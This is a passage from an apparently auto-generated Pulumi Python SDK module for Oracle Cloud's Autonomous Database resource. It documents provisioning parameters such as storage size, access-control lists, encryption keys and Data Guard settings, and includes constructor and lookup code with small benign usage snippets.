:param pulumi.Input[bool] are_primary_whitelisted_ips_used: (Updatable) This field is null if the Autonomous Database is not Data Guard enabled or Access Control is disabled. Its value is `TRUE` if the Autonomous Database is Data Guard enabled, Access Control is enabled, and the Autonomous Database uses the primary's IP access control list (ACL) for the standby. Its value is `FALSE` if the Autonomous Database is Data Guard enabled, Access Control is enabled, and the Autonomous Database uses a different IP access control list (ACL) for the standby than for the primary.
:param pulumi.Input[str] autonomous_container_database_id: The Autonomous Container Database [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm).
:param pulumi.Input[str] autonomous_database_backup_id: The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the source Autonomous Database Backup that you will clone to create a new Autonomous Database.
:param pulumi.Input[str] autonomous_database_id: The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the source Autonomous Database that you will clone to create a new Autonomous Database.
:param pulumi.Input[str] autonomous_maintenance_schedule_type: The maintenance schedule type of the Autonomous Database on shared Exadata infrastructure. The EARLY maintenance schedule applies patches prior to the REGULAR schedule. The REGULAR maintenance schedule follows the normal cycle.
:param pulumi.Input[str] clone_type: The Autonomous Database clone type.
:param pulumi.Input[str] compartment_id: (Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment of the Autonomous Database.
:param pulumi.Input[int] cpu_core_count: (Updatable) The number of OCPU cores to be made available to the database. For Autonomous Databases on dedicated Exadata infrastructure, the maximum number of cores is determined by the infrastructure shape. See [Characteristics of Infrastructure Shapes](https://www.oracle.com/pls/topic/lookup?ctx=en/cloud/paas/autonomous-database&id=ATPFG-GUID-B0F033C1-CC5A-42F0-B2E7-3CECFEDA1FD1) for shape details.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['AutonomousDatabaseCustomerContactArgs']]]] customer_contacts: (Updatable) Customer Contacts.
:param pulumi.Input[str] data_safe_status: (Updatable) Status of the Data Safe registration for this Autonomous Database. Could be REGISTERED or NOT_REGISTERED.
:param pulumi.Input[int] data_storage_size_in_gb: (Updatable) The size, in gigabytes, of the data volume that will be created and attached to the database. This storage can later be scaled up if needed. The maximum storage value is determined by the infrastructure shape. See [Characteristics of Infrastructure Shapes](https://www.oracle.com/pls/topic/lookup?ctx=en/cloud/paas/autonomous-database&id=ATPFG-GUID-B0F033C1-CC5A-42F0-B2E7-3CECFEDA1FD1) for shape details.
:param pulumi.Input[int] data_storage_size_in_tbs: (Updatable) The size, in terabytes, of the data volume that will be created and attached to the database. This storage can later be scaled up if needed. For Autonomous Databases on dedicated Exadata infrastructure, the maximum storage value is determined by the infrastructure shape. See [Characteristics of Infrastructure Shapes](https://www.oracle.com/pls/topic/lookup?ctx=en/cloud/paas/autonomous-database&id=ATPFG-GUID-B0F033C1-CC5A-42F0-B2E7-3CECFEDA1FD1) for shape details.
:param pulumi.Input[str] db_name: The database name. The name must begin with an alphabetic character and can contain a maximum of 14 alphanumeric characters. Special characters are not permitted. The database name must be unique in the tenancy.
:param pulumi.Input[str] db_version: (Updatable) A valid Oracle Database version for Autonomous Database. `db_workload` values AJD and APEX are only supported for `db_version` `19c` and above.
:param pulumi.Input[str] db_workload: (Updatable) The Autonomous Database workload type. The following values are valid:
* OLTP - indicates an Autonomous Transaction Processing database
* DW - indicates an Autonomous Data Warehouse database
* AJD - indicates an Autonomous JSON Database
* APEX - indicates an Autonomous Database with the Oracle APEX Application Development workload type. Note: `db_workload` can only be updated from AJD to OLTP or from a free OLTP database to AJD.
:param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm).
:param pulumi.Input[str] display_name: (Updatable) The user-friendly name for the Autonomous Database. The name does not have to be unique.
:param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Department": "Finance"}`
:param pulumi.Input[bool] is_access_control_enabled: (Updatable) Indicates if database-level access control is enabled. If disabled, database access is defined by the network security rules. If enabled, database access is restricted to the IP addresses defined by the rules specified with the `whitelistedIps` property. While specifying `whitelistedIps` rules is optional, if database-level access control is enabled and no rules are specified, the database will become inaccessible. The rules can be added later using the `UpdateAutonomousDatabase` API operation or the edit option in the console. When creating a database clone, the desired access control setting should be specified. By default, database-level access control is disabled for the clone.
:param pulumi.Input[bool] is_auto_scaling_enabled: (Updatable) Indicates if auto scaling is enabled for the Autonomous Database OCPU core count. The default value is `FALSE`.
:param pulumi.Input[bool] is_data_guard_enabled: (Updatable) Indicates whether the Autonomous Database has Data Guard enabled.
:param pulumi.Input[bool] is_dedicated: True if the database is on [dedicated Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adbddoverview.htm).
:param pulumi.Input[bool] is_free_tier: (Updatable) Indicates if this is an Always Free resource. The default value is false. Note that Always Free Autonomous Databases have 1 CPU and 20GB of memory. For Always Free databases, memory and CPU cannot be scaled. When `db_workload` is `AJD` or `APEX` it cannot be `true`.
:param pulumi.Input[bool] is_preview_version_with_service_terms_accepted: If set to `TRUE`, indicates that an Autonomous Database preview version is being provisioned, and that the preview version's terms of service have been accepted. Note that preview version software is only available for databases on [shared Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adboverview.htm#AEI).
:param pulumi.Input[bool] is_refreshable_clone: (Updatable) True to create a refreshable clone; False to detach the clone from the source Autonomous Database. Detaching is a one-time operation, after which the clone becomes a regular Autonomous Database.
:param pulumi.Input[str] kms_key_id: The OCID of the key container that is used as the master encryption key in database transparent data encryption (TDE) operations.
:param pulumi.Input[str] license_model: (Updatable) The Oracle license model that applies to the Oracle Autonomous Database. Bring your own license (BYOL) allows you to apply your current on-premises Oracle software licenses to equivalent, highly automated Oracle PaaS and IaaS services in the cloud. License Included allows you to subscribe to new Oracle Database software licenses and the Database service. Note that when provisioning an Autonomous Database on [dedicated Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adbddoverview.htm), this attribute must be null because the attribute is already set at the Autonomous Exadata Infrastructure level. When using [shared Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adboverview.htm#AEI), if a value is not specified, the system supplies the value `BRING_YOUR_OWN_LICENSE`. This field is required when `db_workload` is AJD and must be set to `LICENSE_INCLUDED`, because AJD does not support the default `license_model` value `BRING_YOUR_OWN_LICENSE`.
:param pulumi.Input[Sequence[pulumi.Input[str]]] nsg_ids: (Updatable) A list of the [OCIDs](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the network security groups (NSGs) that this resource belongs to. Setting this to an empty array after the list is created removes the resource from all NSGs. For more information about NSGs, see [Security Rules](https://docs.cloud.oracle.com/iaas/Content/Network/Concepts/securityrules.htm). **NsgIds restrictions:**
* Autonomous Databases with private access require at least 1 Network Security Group (NSG). The nsgIds array cannot be empty.
:param pulumi.Input[float] ocpu_count: (Updatable) The number of OCPU cores to be made available to the database.
:param pulumi.Input[str] open_mode: The `DATABASE OPEN` mode. You can open the database in `READ_ONLY` or `READ_WRITE` mode.
:param pulumi.Input[str] operations_insights_status: Status of Operations Insights for this Autonomous Database.
:param pulumi.Input[str] permission_level: The Autonomous Database permission level. Restricted mode allows access only to admin users.
:param pulumi.Input[str] private_endpoint_label: (Updatable) The private endpoint label for the resource.
:param pulumi.Input[str] refreshable_mode: (Updatable) The refresh mode of the clone. AUTOMATIC indicates that the clone is automatically being refreshed with data from the source Autonomous Database.
:param pulumi.Input[bool] rotate_key_trigger: (Updatable) An optional property that, when flipped, triggers rotation of the KMS key. It is applicable only to dedicated databases, i.e. where `is_dedicated` is true.
:param pulumi.Input[str] source: The source of the database: Use `NONE` for creating a new Autonomous Database. Use `DATABASE` for creating a new Autonomous Database by cloning an existing Autonomous Database.
:param pulumi.Input[str] source_id: The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the source Autonomous Database that you will clone to create a new Autonomous Database.
:param pulumi.Input[Sequence[pulumi.Input[str]]] standby_whitelisted_ips: (Updatable) The client IP access control list (ACL). This feature is available for autonomous databases on [shared Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adboverview.htm#AEI) and on Exadata Cloud@Customer. Only clients connecting from an IP address included in the ACL may access the Autonomous Database instance.
:param pulumi.Input[str] state: (Updatable) The current state of the Autonomous Database. Can be set to `AVAILABLE` or `STOPPED`.
:param pulumi.Input[str] subnet_id: (Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the subnet the resource is associated with.
:param pulumi.Input[str] switchover_to: It is applicable only when `is_data_guard_enabled` is true. Could be set to `PRIMARY` or `STANDBY`. Default value is `PRIMARY`.
:param pulumi.Input[str] timestamp: The timestamp specified for the point-in-time clone of the source Autonomous Database. The timestamp must be in the past.
:param pulumi.Input[str] vault_id: The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the Oracle Cloud Infrastructure [vault](https://docs.cloud.oracle.com/iaas/Content/KeyManagement/Concepts/keyoverview.htm#concepts).
:param pulumi.Input[Sequence[pulumi.Input[str]]] whitelisted_ips: (Updatable) The client IP access control list (ACL). This feature is available for autonomous databases on [shared Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adboverview.htm#AEI) and on Exadata Cloud@Customer. Only clients connecting from an IP address included in the ACL may access the Autonomous Database instance.
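The `admin_password` constraints described above can be sanity-checked locally before provisioning; this helper is purely illustrative and not part of the provider:
```python
def is_valid_admin_password(password: str) -> bool:
    # 12-30 characters, at least one uppercase, one lowercase, and one digit;
    # may not contain a double quote or the word "admin" in any casing.
    if not 12 <= len(password) <= 30:
        return False
    if '"' in password or "admin" in password.lower():
        return False
    return (any(c.isupper() for c in password)
            and any(c.islower() for c in password)
            and any(c.isdigit() for c in password))
```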
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: AutonomousDatabaseArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
This resource provides the Autonomous Database resource in Oracle Cloud Infrastructure Database service.
Creates a new Autonomous Database.
## Import
AutonomousDatabases can be imported using the `id`, e.g.
```sh
$ pulumi import oci:database/autonomousDatabase:AutonomousDatabase test_autonomous_database "id"
```
:param str resource_name: The name of the resource.
:param AutonomousDatabaseArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(AutonomousDatabaseArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
admin_password: Optional[pulumi.Input[str]] = None,
are_primary_whitelisted_ips_used: Optional[pulumi.Input[bool]] = None,
autonomous_container_database_id: Optional[pulumi.Input[str]] = None,
autonomous_database_backup_id: Optional[pulumi.Input[str]] = None,
autonomous_database_id: Optional[pulumi.Input[str]] = None,
autonomous_maintenance_schedule_type: Optional[pulumi.Input[str]] = None,
clone_type: Optional[pulumi.Input[str]] = None,
compartment_id: Optional[pulumi.Input[str]] = None,
cpu_core_count: Optional[pulumi.Input[int]] = None,
customer_contacts: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['AutonomousDatabaseCustomerContactArgs']]]]] = None,
data_safe_status: Optional[pulumi.Input[str]] = None,
data_storage_size_in_gb: Optional[pulumi.Input[int]] = None,
data_storage_size_in_tbs: Optional[pulumi.Input[int]] = None,
db_name: Optional[pulumi.Input[str]] = None,
db_version: Optional[pulumi.Input[str]] = None,
db_workload: Optional[pulumi.Input[str]] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
display_name: Optional[pulumi.Input[str]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
is_access_control_enabled: Optional[pulumi.Input[bool]] = None,
is_auto_scaling_enabled: Optional[pulumi.Input[bool]] = None,
is_data_guard_enabled: Optional[pulumi.Input[bool]] = None,
is_dedicated: Optional[pulumi.Input[bool]] = None,
is_free_tier: Optional[pulumi.Input[bool]] = None,
is_preview_version_with_service_terms_accepted: Optional[pulumi.Input[bool]] = None,
is_refreshable_clone: Optional[pulumi.Input[bool]] = None,
kms_key_id: Optional[pulumi.Input[str]] = None,
license_model: Optional[pulumi.Input[str]] = None,
nsg_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
ocpu_count: Optional[pulumi.Input[float]] = None,
open_mode: Optional[pulumi.Input[str]] = None,
operations_insights_status: Optional[pulumi.Input[str]] = None,
permission_level: Optional[pulumi.Input[str]] = None,
private_endpoint_label: Optional[pulumi.Input[str]] = None,
refreshable_mode: Optional[pulumi.Input[str]] = None,
rotate_key_trigger: Optional[pulumi.Input[bool]] = None,
source: Optional[pulumi.Input[str]] = None,
source_id: Optional[pulumi.Input[str]] = None,
standby_whitelisted_ips: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
state: Optional[pulumi.Input[str]] = None,
subnet_id: Optional[pulumi.Input[str]] = None,
switchover_to: Optional[pulumi.Input[str]] = None,
timestamp: Optional[pulumi.Input[str]] = None,
vault_id: Optional[pulumi.Input[str]] = None,
whitelisted_ips: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = AutonomousDatabaseArgs.__new__(AutonomousDatabaseArgs)
__props__.__dict__["admin_password"] = admin_password
__props__.__dict__["are_primary_whitelisted_ips_used"] = are_primary_whitelisted_ips_used
__props__.__dict__["autonomous_container_database_id"] = autonomous_container_database_id
__props__.__dict__["autonomous_database_backup_id"] = autonomous_database_backup_id
__props__.__dict__["autonomous_database_id"] = autonomous_database_id
__props__.__dict__["autonomous_maintenance_schedule_type"] = autonomous_maintenance_schedule_type
__props__.__dict__["clone_type"] = clone_type
if compartment_id is None and not opts.urn:
raise TypeError("Missing required property 'compartment_id'")
__props__.__dict__["compartment_id"] = compartment_id
__props__.__dict__["cpu_core_count"] = cpu_core_count
__props__.__dict__["customer_contacts"] = customer_contacts
__props__.__dict__["data_safe_status"] = data_safe_status
__props__.__dict__["data_storage_size_in_gb"] = data_storage_size_in_gb
__props__.__dict__["data_storage_size_in_tbs"] = data_storage_size_in_tbs
if db_name is None and not opts.urn:
raise TypeError("Missing required property 'db_name'")
__props__.__dict__["db_name"] = db_name
__props__.__dict__["db_version"] = db_version
__props__.__dict__["db_workload"] = db_workload
__props__.__dict__["defined_tags"] = defined_tags
__props__.__dict__["display_name"] = display_name
__props__.__dict__["freeform_tags"] = freeform_tags
__props__.__dict__["is_access_control_enabled"] = is_access_control_enabled
__props__.__dict__["is_auto_scaling_enabled"] = is_auto_scaling_enabled
__props__.__dict__["is_data_guard_enabled"] = is_data_guard_enabled
__props__.__dict__["is_dedicated"] = is_dedicated
__props__.__dict__["is_free_tier"] = is_free_tier
__props__.__dict__["is_preview_version_with_service_terms_accepted"] = is_preview_version_with_service_terms_accepted
__props__.__dict__["is_refreshable_clone"] = is_refreshable_clone
__props__.__dict__["kms_key_id"] = kms_key_id
__props__.__dict__["license_model"] = license_model
__props__.__dict__["nsg_ids"] = nsg_ids
__props__.__dict__["ocpu_count"] = ocpu_count
__props__.__dict__["open_mode"] = open_mode
__props__.__dict__["operations_insights_status"] = operations_insights_status
__props__.__dict__["permission_level"] = permission_level
__props__.__dict__["private_endpoint_label"] = private_endpoint_label
__props__.__dict__["refreshable_mode"] = refreshable_mode
__props__.__dict__["rotate_key_trigger"] = rotate_key_trigger
__props__.__dict__["source"] = source
__props__.__dict__["source_id"] = source_id
__props__.__dict__["standby_whitelisted_ips"] = standby_whitelisted_ips
__props__.__dict__["state"] = state
__props__.__dict__["subnet_id"] = subnet_id
__props__.__dict__["switchover_to"] = switchover_to
__props__.__dict__["timestamp"] = timestamp
__props__.__dict__["vault_id"] = vault_id
__props__.__dict__["whitelisted_ips"] = whitelisted_ips
__props__.__dict__["apex_details"] = None
__props__.__dict__["available_upgrade_versions"] = None
__props__.__dict__["backup_config"] = None
__props__.__dict__["connection_strings"] = None
__props__.__dict__["connection_urls"] = None
__props__.__dict__["failed_data_recovery_in_seconds"] = None
__props__.__dict__["infrastructure_type"] = None
__props__.__dict__["is_preview"] = None
__props__.__dict__["key_history_entries"] = None
__props__.__dict__["key_store_id"] = None
__props__.__dict__["key_store_wallet_name"] = None
__props__.__dict__["kms_key_lifecycle_details"] = None
__props__.__dict__["lifecycle_details"] = None
__props__.__dict__["private_endpoint"] = None
__props__.__dict__["private_endpoint_ip"] = None
__props__.__dict__["refreshable_status"] = None
__props__.__dict__["role"] = None
__props__.__dict__["service_console_url"] = None
__props__.__dict__["standby_db"] = None
__props__.__dict__["system_tags"] = None
__props__.__dict__["time_created"] = None
__props__.__dict__["time_deletion_of_free_autonomous_database"] = None
__props__.__dict__["time_maintenance_begin"] = None
__props__.__dict__["time_maintenance_end"] = None
__props__.__dict__["time_of_last_failover"] = None
__props__.__dict__["time_of_last_refresh"] = None
__props__.__dict__["time_of_last_refresh_point"] = None
__props__.__dict__["time_of_last_switchover"] = None
__props__.__dict__["time_of_next_refresh"] = None
__props__.__dict__["time_reclamation_of_free_autonomous_database"] = None
__props__.__dict__["used_data_storage_size_in_tbs"] = None
super(AutonomousDatabase, __self__).__init__(
'oci:database/autonomousDatabase:AutonomousDatabase',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
admin_password: Optional[pulumi.Input[str]] = None,
apex_details: Optional[pulumi.Input[pulumi.InputType['AutonomousDatabaseApexDetailsArgs']]] = None,
are_primary_whitelisted_ips_used: Optional[pulumi.Input[bool]] = None,
autonomous_container_database_id: Optional[pulumi.Input[str]] = None,
autonomous_database_backup_id: Optional[pulumi.Input[str]] = None,
autonomous_database_id: Optional[pulumi.Input[str]] = None,
autonomous_maintenance_schedule_type: Optional[pulumi.Input[str]] = None,
available_upgrade_versions: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
backup_config: Optional[pulumi.Input[pulumi.InputType['AutonomousDatabaseBackupConfigArgs']]] = None,
clone_type: Optional[pulumi.Input[str]] = None,
compartment_id: Optional[pulumi.Input[str]] = None,
connection_strings: Optional[pulumi.Input[pulumi.InputType['AutonomousDatabaseConnectionStringsArgs']]] = None,
connection_urls: Optional[pulumi.Input[pulumi.InputType['AutonomousDatabaseConnectionUrlsArgs']]] = None,
cpu_core_count: Optional[pulumi.Input[int]] = None,
customer_contacts: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['AutonomousDatabaseCustomerContactArgs']]]]] = None,
data_safe_status: Optional[pulumi.Input[str]] = None,
data_storage_size_in_gb: Optional[pulumi.Input[int]] = None,
data_storage_size_in_tbs: Optional[pulumi.Input[int]] = None,
db_name: Optional[pulumi.Input[str]] = None,
db_version: Optional[pulumi.Input[str]] = None,
db_workload: Optional[pulumi.Input[str]] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
display_name: Optional[pulumi.Input[str]] = None,
failed_data_recovery_in_seconds: Optional[pulumi.Input[int]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
infrastructure_type: Optional[pulumi.Input[str]] = None,
is_access_control_enabled: Optional[pulumi.Input[bool]] = None,
is_auto_scaling_enabled: Optional[pulumi.Input[bool]] = None,
is_data_guard_enabled: Optional[pulumi.Input[bool]] = None,
is_dedicated: Optional[pulumi.Input[bool]] = None,
is_free_tier: Optional[pulumi.Input[bool]] = None,
is_preview: Optional[pulumi.Input[bool]] = None,
is_preview_version_with_service_terms_accepted: Optional[pulumi.Input[bool]] = None,
is_refreshable_clone: Optional[pulumi.Input[bool]] = None,
key_history_entries: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['AutonomousDatabaseKeyHistoryEntryArgs']]]]] = None,
key_store_id: Optional[pulumi.Input[str]] = None,
key_store_wallet_name: Optional[pulumi.Input[str]] = None,
kms_key_id: Optional[pulumi.Input[str]] = None,
kms_key_lifecycle_details: Optional[pulumi.Input[str]] = None,
license_model: Optional[pulumi.Input[str]] = None,
lifecycle_details: Optional[pulumi.Input[str]] = None,
nsg_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
ocpu_count: Optional[pulumi.Input[float]] = None,
open_mode: Optional[pulumi.Input[str]] = None,
operations_insights_status: Optional[pulumi.Input[str]] = None,
permission_level: Optional[pulumi.Input[str]] = None,
private_endpoint: Optional[pulumi.Input[str]] = None,
private_endpoint_ip: Optional[pulumi.Input[str]] = None,
private_endpoint_label: Optional[pulumi.Input[str]] = None,
refreshable_mode: Optional[pulumi.Input[str]] = None,
refreshable_status: Optional[pulumi.Input[str]] = None,
role: Optional[pulumi.Input[str]] = None,
rotate_key_trigger: Optional[pulumi.Input[bool]] = None,
service_console_url: Optional[pulumi.Input[str]] = None,
source: Optional[pulumi.Input[str]] = None,
source_id: Optional[pulumi.Input[str]] = None,
standby_db: Optional[pulumi.Input[pulumi.InputType['AutonomousDatabaseStandbyDbArgs']]] = None,
standby_whitelisted_ips: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
state: Optional[pulumi.Input[str]] = None,
subnet_id: Optional[pulumi.Input[str]] = None,
switchover_to: Optional[pulumi.Input[str]] = None,
system_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
time_created: Optional[pulumi.Input[str]] = None,
time_deletion_of_free_autonomous_database: Optional[pulumi.Input[str]] = None,
time_maintenance_begin: Optional[pulumi.Input[str]] = None,
time_maintenance_end: Optional[pulumi.Input[str]] = None,
time_of_last_failover: Optional[pulumi.Input[str]] = None,
time_of_last_refresh: Optional[pulumi.Input[str]] = None,
time_of_last_refresh_point: Optional[pulumi.Input[str]] = None,
time_of_last_switchover: Optional[pulumi.Input[str]] = None,
time_of_next_refresh: Optional[pulumi.Input[str]] = None,
time_reclamation_of_free_autonomous_database: Optional[pulumi.Input[str]] = None,
timestamp: Optional[pulumi.Input[str]] = None,
used_data_storage_size_in_tbs: Optional[pulumi.Input[int]] = None,
vault_id: Optional[pulumi.Input[str]] = None,
whitelisted_ips: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None) -> 'AutonomousDatabase':
"""
Get an existing AutonomousDatabase resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
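For example, assuming an existing database's OCID (the OCID below is a placeholder):
```python
import pulumi_oci as oci

# Look up an already-provisioned Autonomous Database by its OCID.
existing = oci.database.AutonomousDatabase.get("existing",
    "ocid1.autonomousdatabase.oc1..exampleuniqueid")  # placeholder OCID
```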
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] admin_password: (Updatable) The password must be between 12 and 30 characters long, and must contain at least 1 uppercase, 1 lowercase, and 1 numeric character. It cannot contain the double quote symbol (") or the username "admin", regardless of casing. The password is mandatory if source value is "BACKUP_FROM_ID", "BACKUP_FROM_TIMESTAMP", "DATABASE" or "NONE".
:param pulumi.Input[pulumi.InputType['AutonomousDatabaseApexDetailsArgs']] apex_details: Information about Oracle APEX Application Development.
:param pulumi.Input[bool] are_primary_whitelisted_ips_used: (Updatable) This field is null if the Autonomous Database is not Data Guard enabled or Access Control is disabled. Its value is `TRUE` if the Autonomous Database is Data Guard enabled, Access Control is enabled, and the Autonomous Database uses the primary's IP access control list (ACL) for the standby. Its value is `FALSE` if the Autonomous Database is Data Guard enabled, Access Control is enabled, and the standby uses a different IP access control list (ACL) than the primary.
:param pulumi.Input[str] autonomous_container_database_id: The Autonomous Container Database [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm).
:param pulumi.Input[str] autonomous_database_backup_id: The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the source Autonomous Database Backup that you will clone to create a new Autonomous Database.
:param pulumi.Input[str] autonomous_database_id: The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the source Autonomous Database that you will clone to create a new Autonomous Database.
:param pulumi.Input[str] autonomous_maintenance_schedule_type: The maintenance schedule type of the Autonomous Database on shared Exadata infrastructure. The EARLY maintenance schedule applies patches prior to the REGULAR schedule. The REGULAR maintenance schedule follows the normal cycle.
:param pulumi.Input[Sequence[pulumi.Input[str]]] available_upgrade_versions: List of Oracle Database versions available for a database upgrade. If there are no version upgrades available, this list is empty.
:param pulumi.Input[pulumi.InputType['AutonomousDatabaseBackupConfigArgs']] backup_config: Autonomous Database configuration details for storing [manual backups](https://docs.cloud.oracle.com/iaas/Content/Database/Tasks/adbbackingup.htm) in the [Object Storage](https://docs.cloud.oracle.com/iaas/Content/Object/Concepts/objectstorageoverview.htm) service.
:param pulumi.Input[str] clone_type: The Autonomous Database clone type.
:param pulumi.Input[str] compartment_id: (Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment of the Autonomous Database.
:param pulumi.Input[pulumi.InputType['AutonomousDatabaseConnectionStringsArgs']] connection_strings: The connection string used to connect to the Autonomous Database. The username for the Service Console is ADMIN. Use the password you entered when creating the Autonomous Database for the password value.
:param pulumi.Input[pulumi.InputType['AutonomousDatabaseConnectionUrlsArgs']] connection_urls: The URLs for accessing Oracle Application Express (APEX) and SQL Developer Web with a browser from a Compute instance within your VCN, or from a client that has a direct connection to your VCN. Note that these URLs are provided by the console only for databases on [dedicated Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adbddoverview.htm). Example: `{"sqlDevWebUrl": "https://<hostname>/ords...", "apexUrl": "https://<hostname>/ords..."}`
:param pulumi.Input[int] cpu_core_count: (Updatable) The number of OCPU cores to be made available to the database. For Autonomous Databases on dedicated Exadata infrastructure, the maximum number of cores is determined by the infrastructure shape. See [Characteristics of Infrastructure Shapes](https://www.oracle.com/pls/topic/lookup?ctx=en/cloud/paas/autonomous-database&id=ATPFG-GUID-B0F033C1-CC5A-42F0-B2E7-3CECFEDA1FD1) for shape details.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['AutonomousDatabaseCustomerContactArgs']]]] customer_contacts: (Updatable) Customer Contacts.
:param pulumi.Input[str] data_safe_status: (Updatable) Status of the Data Safe registration for this Autonomous Database. Could be REGISTERED or NOT_REGISTERED.
:param pulumi.Input[int] data_storage_size_in_gb: (Updatable) The size, in gigabytes, of the data volume that will be created and attached to the database. This storage can later be scaled up if needed. The maximum storage value is determined by the infrastructure shape. See [Characteristics of Infrastructure Shapes](https://www.oracle.com/pls/topic/lookup?ctx=en/cloud/paas/autonomous-database&id=ATPFG-GUID-B0F033C1-CC5A-42F0-B2E7-3CECFEDA1FD1) for shape details.
:param pulumi.Input[int] data_storage_size_in_tbs: (Updatable) The size, in terabytes, of the data volume that will be created and attached to the database. This storage can later be scaled up if needed. For Autonomous Databases on dedicated Exadata infrastructure, the maximum storage value is determined by the infrastructure shape. See [Characteristics of Infrastructure Shapes](https://www.oracle.com/pls/topic/lookup?ctx=en/cloud/paas/autonomous-database&id=ATPFG-GUID-B0F033C1-CC5A-42F0-B2E7-3CECFEDA1FD1) for shape details.
:param pulumi.Input[str] db_name: The database name. The name must begin with an alphabetic character and can contain a maximum of 14 alphanumeric characters. Special characters are not permitted. The database name must be unique in the tenancy.
:param pulumi.Input[str] db_version: (Updatable) A valid Oracle Database version for Autonomous Database. The `db_workload` values AJD and APEX are only supported for `db_version` `19c` and above.
:param pulumi.Input[str] db_workload: (Updatable) The Autonomous Database workload type. The following values are valid:
* OLTP - indicates an Autonomous Transaction Processing database
* DW - indicates an Autonomous Data Warehouse database
* AJD - indicates an Autonomous JSON Database
* APEX - indicates an Autonomous Database with the Oracle APEX Application Development workload type. **Note:** `db_workload` can only be updated from AJD to OLTP, or from a free OLTP to AJD.
:param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm).
:param pulumi.Input[str] display_name: (Updatable) The user-friendly name for the Autonomous Database. The name does not have to be unique.
:param pulumi.Input[int] failed_data_recovery_in_seconds: Indicates the number of seconds of data loss for a Data Guard failover.
:param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Department": "Finance"}`
:param pulumi.Input[str] infrastructure_type: The infrastructure type this resource belongs to.
